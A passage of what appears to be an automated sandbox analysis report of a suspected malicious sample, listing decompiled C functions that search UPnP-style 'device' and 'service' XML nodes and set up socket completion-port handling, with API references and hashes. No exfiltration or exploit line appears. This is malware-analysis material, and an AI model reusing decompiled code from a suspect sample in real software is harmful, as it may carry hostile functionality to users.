                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v24 = 0;
                                                                                                                                                                                                                                                                  							_push( &_v24);
                                                                                                                                                                                                                                                                  							_push(_v20);
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                  								if(lstrcmpiW(_v24, L"device") == 0) {
                                                                                                                                                                                                                                                                  									_t65 = E0040BF20(_v20, L"deviceType");
                                                                                                                                                                                                                                                                  									_t99 = _t99 + 8;
                                                                                                                                                                                                                                                                  									_v28 = _t65;
                                                                                                                                                                                                                                                                  									if(_v28 != 0) {
                                                                                                                                                                                                                                                                  										_v32 = 0;
                                                                                                                                                                                                                                                                  										_push( &_v32);
                                                                                                                                                                                                                                                                  										_push(_v28);
                                                                                                                                                                                                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                                                                                                                                                                                                  												_v12 = _v20;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											__imp__#6(_v32);
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__imp__#6(_v24);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if(_v12 == 0) {
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                  								goto L21;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L22;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L22:
                                                                                                                                                                                                                                                                  				return _v12;
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x0040c606
                                                                                                                                                                                                                                                                  0x0040c60d
                                                                                                                                                                                                                                                                  0x0040c617
                                                                                                                                                                                                                                                                  0x0040c620
                                                                                                                                                                                                                                                                  0x0040c628
                                                                                                                                                                                                                                                                  0x0040c638
                                                                                                                                                                                                                                                                  0x0040c64a
                                                                                                                                                                                                                                                                  0x0040c656
                                                                                                                                                                                                                                                                  0x0040c660
                                                                                                                                                                                                                                                                  0x0040c664
                                                                                                                                                                                                                                                                  0x0040c66d
                                                                                                                                                                                                                                                                  0x0040c675
                                                                                                                                                                                                                                                                  0x0040c753
                                                                                                                                                                                                                                                                  0x0040c647
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c68f
                                                                                                                                                                                                                                                                  0x0040c698
                                                                                                                                                                                                                                                                  0x0040c6a3
                                                                                                                                                                                                                                                                  0x0040c6c4
                                                                                                                                                                                                                                                                  0x0040c6cf
                                                                                                                                                                                                                                                                  0x0040c6d4
                                                                                                                                                                                                                                                                  0x0040c6d7
                                                                                                                                                                                                                                                                  0x0040c6de
                                                                                                                                                                                                                                                                  0x0040c6e0
                                                                                                                                                                                                                                                                  0x0040c6ea
                                                                                                                                                                                                                                                                  0x0040c6f3
                                                                                                                                                                                                                                                                  0x0040c6fb
                                                                                                                                                                                                                                                                  0x0040c713
                                                                                                                                                                                                                                                                  0x0040c718
                                                                                                                                                                                                                                                                  0x0040c718
                                                                                                                                                                                                                                                                  0x0040c71f
                                                                                                                                                                                                                                                                  0x0040c71f
                                                                                                                                                                                                                                                                  0x0040c731
                                                                                                                                                                                                                                                                  0x0040c731
                                                                                                                                                                                                                                                                  0x0040c6de
                                                                                                                                                                                                                                                                  0x0040c737
                                                                                                                                                                                                                                                                  0x0040c737
                                                                                                                                                                                                                                                                  0x0040c741
                                                                                                                                                                                                                                                                  0x0040c751
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c743
                                                                                                                                                                                                                                                                  0x0040c741
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c675
                                                                                                                                                                                                                                                                  0x0040c64a
                                                                                                                                                                                                                                                                  0x0040c758
                                                                                                                                                                                                                                                                  0x0040c75e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040C6BC
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C70B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C71F
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C737
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: device$deviceType
                                                                                                                                                                                                                                                                  • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                                  • Opcode ID: fe87e6628fcac155b9e879abce0148de49b56393ca47e6d93c48dfd4937e9403
                                                                                                                                                                                                                                                                  • Instruction ID: 946d26c0edd9c36ec89eb3e0069362279d3cced2e82af026dca6f4f88739a964
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe87e6628fcac155b9e879abce0148de49b56393ca47e6d93c48dfd4937e9403
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3341F975A0020ADFCB14DF98C884BAFB7B9BF48304F108669E515B73A0D778AA45CF95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                                                                                                                  			E0040C420(intOrPtr* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				WCHAR* _v12;
                                                                                                                                                                                                                                                                  				WCHAR* _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				WCHAR* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr* _v28;
                                                                                                                                                                                                                                                                  				WCHAR* _v32;
                                                                                                                                                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                                                                                                                                                  				void* _t99;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_push( &_v8);
                                                                                                                                                                                                                                                                  				_push(_a4);
                                                                                                                                                                                                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                  						_v20 = 0;
                                                                                                                                                                                                                                                                  						_push( &_v20);
                                                                                                                                                                                                                                                                  						_push(_v16);
                                                                                                                                                                                                                                                                  						_push(_a4);
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                  							L21:
                                                                                                                                                                                                                                                                  							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v24 = 0;
                                                                                                                                                                                                                                                                  							_push( &_v24);
                                                                                                                                                                                                                                                                  							_push(_v20);
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                  								if(lstrcmpiW(_v24, L"service") == 0) {
                                                                                                                                                                                                                                                                  									_t65 = E0040BF20(_v20, L"serviceType");
                                                                                                                                                                                                                                                                  									_t99 = _t99 + 8;
                                                                                                                                                                                                                                                                  									_v28 = _t65;
                                                                                                                                                                                                                                                                  									if(_v28 != 0) {
                                                                                                                                                                                                                                                                  										_v32 = 0;
                                                                                                                                                                                                                                                                  										_push( &_v32);
                                                                                                                                                                                                                                                                  										_push(_v28);
                                                                                                                                                                                                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                                                                                                                                                                                                  												_v12 = _v20;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											__imp__#6(_v32);
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__imp__#6(_v24);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if(_v12 == 0) {
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                  								goto L21;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L22;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L22:
                                                                                                                                                                                                                                                                  				return _v12;
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x0040c426
                                                                                                                                                                                                                                                                  0x0040c42d
                                                                                                                                                                                                                                                                  0x0040c437
                                                                                                                                                                                                                                                                  0x0040c440
                                                                                                                                                                                                                                                                  0x0040c448
                                                                                                                                                                                                                                                                  0x0040c458
                                                                                                                                                                                                                                                                  0x0040c46a
                                                                                                                                                                                                                                                                  0x0040c476
                                                                                                                                                                                                                                                                  0x0040c480
                                                                                                                                                                                                                                                                  0x0040c484
                                                                                                                                                                                                                                                                  0x0040c48d
                                                                                                                                                                                                                                                                  0x0040c495
                                                                                                                                                                                                                                                                  0x0040c573
                                                                                                                                                                                                                                                                  0x0040c467
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4af
                                                                                                                                                                                                                                                                  0x0040c4b8
                                                                                                                                                                                                                                                                  0x0040c4c3
                                                                                                                                                                                                                                                                  0x0040c4e4
                                                                                                                                                                                                                                                                  0x0040c4ef
                                                                                                                                                                                                                                                                  0x0040c4f4
                                                                                                                                                                                                                                                                  0x0040c4f7
                                                                                                                                                                                                                                                                  0x0040c4fe
                                                                                                                                                                                                                                                                  0x0040c500
                                                                                                                                                                                                                                                                  0x0040c50a
                                                                                                                                                                                                                                                                  0x0040c513
                                                                                                                                                                                                                                                                  0x0040c51b
                                                                                                                                                                                                                                                                  0x0040c533
                                                                                                                                                                                                                                                                  0x0040c538
                                                                                                                                                                                                                                                                  0x0040c538
                                                                                                                                                                                                                                                                  0x0040c53f
                                                                                                                                                                                                                                                                  0x0040c53f
                                                                                                                                                                                                                                                                  0x0040c551
                                                                                                                                                                                                                                                                  0x0040c551
                                                                                                                                                                                                                                                                  0x0040c4fe
                                                                                                                                                                                                                                                                  0x0040c557
                                                                                                                                                                                                                                                                  0x0040c557
                                                                                                                                                                                                                                                                  0x0040c561
                                                                                                                                                                                                                                                                  0x0040c571
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c563
                                                                                                                                                                                                                                                                  0x0040c561
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c495
                                                                                                                                                                                                                                                                  0x0040c46a
                                                                                                                                                                                                                                                                  0x0040c578
                                                                                                                                                                                                                                                                  0x0040c57e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040C4DC
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C52B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C53F
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C557
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: service$serviceType
                                                                                                                                                                                                                                                                  • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                                  • Opcode ID: 61097aceb2625611fabd3a5b989b159f71deee9e717a61a2438811a1ee708ea0
                                                                                                                                                                                                                                                                  • Instruction ID: 4db9edca9011b541f59a0e3a8f8a08950e70cb3f27b3d3dc9fef26094afeab9d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61097aceb2625611fabd3a5b989b159f71deee9e717a61a2438811a1ee708ea0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8410C75A0021AEFCB14DF98CC94BAFB7B5BF48304F108269E515B73A0D738A985CB95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                                                                                                                  			E0040DCB0(intOrPtr __eax, void* _a4) {
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                                                                                                                                  				long _t28;
                                                                                                                                                                                                                                                                  				long _t37;
                                                                                                                                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                                                                                                                                  				struct _CRITICAL_SECTION* _t48;
                                                                                                                                                                                                                                                                  				long _t49;
                                                                                                                                                                                                                                                                  				void* _t53;
                                                                                                                                                                                                                                                                  				void* _t54;
                                                                                                                                                                                                                                                                  				void* _t55;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t53 = _a4;
                                                                                                                                                                                                                                                                  				_t45 = __eax;
                                                                                                                                                                                                                                                                  				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_t48 = __eax + 0x20;
                                                                                                                                                                                                                                                                  					_t37 = 0;
                                                                                                                                                                                                                                                                  					EnterCriticalSection(_t48);
                                                                                                                                                                                                                                                                  					_t20 =  *((intOrPtr*)(_t45 + 0x38));
                                                                                                                                                                                                                                                                  					if(_t20 != 0) {
                                                                                                                                                                                                                                                                  						while( *((intOrPtr*)(_t20 + 0x260)) != _t53) {
                                                                                                                                                                                                                                                                  							_t20 =  *((intOrPtr*)(_t20 + 0x280));
                                                                                                                                                                                                                                                                  							if(_t20 != 0) {
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L7;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t37 = 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L7:
                                                                                                                                                                                                                                                                  					LeaveCriticalSection(_t48);
                                                                                                                                                                                                                                                                  					if(_t37 == 0) {
                                                                                                                                                                                                                                                                  						_t49 = E00408820(0x284);
                                                                                                                                                                                                                                                                  						_t55 = _t54 + 4;
                                                                                                                                                                                                                                                                  						if(_t49 == 0) {
                                                                                                                                                                                                                                                                  							L13:
                                                                                                                                                                                                                                                                  							E00409320(_t53);
                                                                                                                                                                                                                                                                  							return _t49;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_t7 = _t49 + 0x264; // 0x264
                                                                                                                                                                                                                                                                  							 *_t49 = 0x69636c69;
                                                                                                                                                                                                                                                                  							 *(_t49 + 0x260) = _t53;
                                                                                                                                                                                                                                                                  							_a4 = 0x10;
                                                                                                                                                                                                                                                                  							__imp__#5(_t53, _t7,  &_a4);
                                                                                                                                                                                                                                                                  							if(CreateIoCompletionPort( *(_t49 + 0x260),  *(_t45 + 8), _t49, 0) !=  *(_t45 + 8)) {
                                                                                                                                                                                                                                                                  								E00408990(_t49);
                                                                                                                                                                                                                                                                  								_t55 = _t55 + 4;
                                                                                                                                                                                                                                                                  								_t49 = 0;
                                                                                                                                                                                                                                                                  								goto L13;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_t28 = E0040BB80();
                                                                                                                                                                                                                                                                  								_t13 = _t49 + 4; // 0x4
                                                                                                                                                                                                                                                                  								InterlockedExchange(_t13, _t28);
                                                                                                                                                                                                                                                                  								_t14 = _t49 + 0x244; // 0x244
                                                                                                                                                                                                                                                                  								_t15 = _t49 + 8; // 0x8
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t49 + 0x27c)) = _t45;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t49 + 0x224)) = 0x200;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t49 + 0x228)) = _t15;
                                                                                                                                                                                                                                                                  								InitializeCriticalSection(_t14);
                                                                                                                                                                                                                                                                  								InterlockedIncrement(_t45 + 0x3c);
                                                                                                                                                                                                                                                                  								E0040DBD0(_t49);
                                                                                                                                                                                                                                                                  								return _t49;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}













                                                                                                                                                                                                                                                                  0x0040dcb1
                                                                                                                                                                                                                                                                  0x0040dcb6
                                                                                                                                                                                                                                                                  0x0040dcbb
                                                                                                                                                                                                                                                                  0x0040dcc4
                                                                                                                                                                                                                                                                  0x0040dcc8
                                                                                                                                                                                                                                                                  0x0040dcca
                                                                                                                                                                                                                                                                  0x0040dcd0
                                                                                                                                                                                                                                                                  0x0040dcd5
                                                                                                                                                                                                                                                                  0x0040dcd7
                                                                                                                                                                                                                                                                  0x0040dcdf
                                                                                                                                                                                                                                                                  0x0040dce7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040dce9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040dce7
                                                                                                                                                                                                                                                                  0x0040dceb
                                                                                                                                                                                                                                                                  0x0040dceb
                                                                                                                                                                                                                                                                  0x0040dced
                                                                                                                                                                                                                                                                  0x0040dcee
                                                                                                                                                                                                                                                                  0x0040dcf6
                                                                                                                                                                                                                                                                  0x0040dd09
                                                                                                                                                                                                                                                                  0x0040dd0b
                                                                                                                                                                                                                                                                  0x0040dd10
                                                                                                                                                                                                                                                                  0x0040ddad
                                                                                                                                                                                                                                                                  0x0040ddae
                                                                                                                                                                                                                                                                  0x0040ddbc
                                                                                                                                                                                                                                                                  0x0040dd16
                                                                                                                                                                                                                                                                  0x0040dd1b
                                                                                                                                                                                                                                                                  0x0040dd23
                                                                                                                                                                                                                                                                  0x0040dd29
                                                                                                                                                                                                                                                                  0x0040dd2f
                                                                                                                                                                                                                                                                  0x0040dd37
                                                                                                                                                                                                                                                                  0x0040dd54
                                                                                                                                                                                                                                                                  0x0040dda3
                                                                                                                                                                                                                                                                  0x0040dda8
                                                                                                                                                                                                                                                                  0x0040ddab
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040dd56
                                                                                                                                                                                                                                                                  0x0040dd56
                                                                                                                                                                                                                                                                  0x0040dd5c
                                                                                                                                                                                                                                                                  0x0040dd60
                                                                                                                                                                                                                                                                  0x0040dd66
                                                                                                                                                                                                                                                                  0x0040dd6c
                                                                                                                                                                                                                                                                  0x0040dd70
                                                                                                                                                                                                                                                                  0x0040dd76
                                                                                                                                                                                                                                                                  0x0040dd80
                                                                                                                                                                                                                                                                  0x0040dd86
                                                                                                                                                                                                                                                                  0x0040dd90
                                                                                                                                                                                                                                                                  0x0040dd96
                                                                                                                                                                                                                                                                  0x0040dda1
                                                                                                                                                                                                                                                                  0x0040dda1
                                                                                                                                                                                                                                                                  0x0040dd54
                                                                                                                                                                                                                                                                  0x0040dcf8
                                                                                                                                                                                                                                                                  0x0040dcfe
                                                                                                                                                                                                                                                                  0x0040dcfe
                                                                                                                                                                                                                                                                  0x0040dcbe
                                                                                                                                                                                                                                                                  0x0040dcc1
                                                                                                                                                                                                                                                                  0x0040dcc1

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040E1BB,00000000), ref: 0040DCCA
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E1BB,00000000), ref: 0040DCEE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8009284dbeec5a339d93d4e9847d0904cb6f8aee2ef6e07f75fb7e1dd5454a0f
                                                                                                                                                                                                                                                                  • Instruction ID: 92082c62fa9631858f637837eb2946efbfd8580dbf5aa9204641a4763d3c3573
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8009284dbeec5a339d93d4e9847d0904cb6f8aee2ef6e07f75fb7e1dd5454a0f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D31F1726002059BD320ABB5ED48A97B3E8FF40724F00453EE54AE7681DB38A808CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                                                                                                                  			E0040C641() {
                                                                                                                                                                                                                                                                  				void* _t85;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0:
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L0:
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L2:
                                                                                                                                                                                                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                                                                                                                                                                                                  					_push(_t85 - 0x10);
                                                                                                                                                                                                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                                                                                                                                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                                                                                                                                                                                                  						L18:
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						L4:
                                                                                                                                                                                                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                                                                                                                                                                                                  						_push(_t85 - 0x14);
                                                                                                                                                                                                                                                                  						_push( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                                                                                                                                                                                                  							L6:
                                                                                                                                                                                                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"device") == 0) {
                                                                                                                                                                                                                                                                  								L7:
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040BF20( *(_t85 - 0x10), L"deviceType");
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                                                                                                                                                                                                  									L8:
                                                                                                                                                                                                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                                                                                                                                                                                                  									_push(_t85 - 0x1c);
                                                                                                                                                                                                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                                                                                                                                                                                                  										L10:
                                                                                                                                                                                                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										L12:
                                                                                                                                                                                                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									L13:
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						L15:
                                                                                                                                                                                                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                                                                                                                                                                                                  							L17:
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                  							goto L18;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					break;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L19:
                                                                                                                                                                                                                                                                  				return  *(_t85 - 8);
                                                                                                                                                                                                                                                                  			}




                                                                                                                                                                                                                                                                  0x0040c641
                                                                                                                                                                                                                                                                  0x0040c641
                                                                                                                                                                                                                                                                  0x0040c641
                                                                                                                                                                                                                                                                  0x0040c647
                                                                                                                                                                                                                                                                  0x0040c650
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c656
                                                                                                                                                                                                                                                                  0x0040c656
                                                                                                                                                                                                                                                                  0x0040c660
                                                                                                                                                                                                                                                                  0x0040c664
                                                                                                                                                                                                                                                                  0x0040c66d
                                                                                                                                                                                                                                                                  0x0040c675
                                                                                                                                                                                                                                                                  0x0040c753
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c685
